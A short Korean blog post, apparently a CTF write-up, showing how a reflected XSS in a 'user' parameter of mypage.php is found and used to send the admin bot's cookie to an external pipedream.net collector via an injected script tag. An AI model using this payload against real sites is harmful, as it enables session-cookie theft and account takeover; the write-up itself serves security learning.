[CTF] XSS 3

CHIKAยท2024๋…„ 6์›” 30์ผ

๐Ÿ“Œ
XSS (Cross Site Scripting)
Cookie ํƒˆ์ทจ


์ทจ์•ฝ์  ์„ค๋ช… : Reflected XSS
์ทจ์•ฝ์  ๋ฐœ์ƒ ์œ„์น˜ : mypage.php


ํšŒ์›๊ฐ€์ž… & ๋กœ๊ทธ์ธํ›„ ๋งˆ์ดํŽ˜์ด์ง€.

ํŒŒ๋ผ๋ฏธํ„ฐ๋กœ user ๊ฐ’์ด ์˜ค๊ณ ์žˆ์œผ๋‹ˆ ์กฐ์ž‘ํ•ด๋ณด์ž.


์ž…๋ ฅ๊ฐ’์œผ๋กœ ๋ฐ”๋€๋‹ค.

ํŠน์ˆ˜๋ฌธ์ž ์‚ฝ์ž…๊ฐ€๋Šฅ ์—ฌ๋ถ€๋ฅผ ํ™•์ธํ•˜๊ธฐ ์œ„ํ•ด test<'">์„ ๋„ฃ์–ด๋ณธ๋‹ค.



๊บฝ์‡  ์‚ฝ์ž…์ด ๊ฐ€๋Šฅํ•˜๋‹ค.

์Šคํฌ๋ฆฝํŠธ ์ž‘๋™์—ฌ๋ถ€๋ฅผ ํ™•์ธํ•˜๊ธฐ ์œ„ํ•ด alert(1)๋จผ์ € ์ถœ๋ ฅํ•ด๋ณด์ž.
๊บฝ์‡  ์‚ฝ์ž…์ด ๊ฐ€๋Šฅํ•˜๋ฏ€๋กœ input ํƒœ๊ทธ๋ฅผ ๋ง‰๊ณ  script๋ฅผ ๋„ฃ์ž.
URL์—์„œ user๋’ค์—

xcvb"/><script>alert(1)</script>

๋ฅผ ์ž…๋ ฅํ•œ๋‹ค.


alert์ฐฝ ์ถœ๋ ฅ!

์ฟ ํ‚คํƒˆ์ทจ ์ฝ”๋“œ๋ฅผ ๋„ฃ์–ด๋ณด์ž
๊ณต๊ฒฉ์ž ์„œ๋ฒ„๋Š” https://en2hyoic3j7mi.x.pipedream.net/ ์ด๋‹ค.
URL์—์„œ user๋’ค์—

xcvb"/><script>var cookieData =document.cookie;var i =new Image(); i.src = `https://en2hyoic3j7mi.x.pipedream.net/?cookie=${cookieData}`;</script>

๋ฅผ ์ž…๋ ฅ.



์ฟ ํ‚ค๊ฐ’์ด ๋„˜์–ด์˜ค๊ณ  ์žˆ๋‹ค.
ํ•ด๋‹น URL์„ ๊ด€๋ฆฌ์ž ๋ด‡์— ์ž…๋ ฅํ•˜์ž.


์ฟ ํ‚ค ํƒˆ์ทจ ์„ฑ๊ณต!

0๊ฐœ์˜ ๋Œ“๊ธ€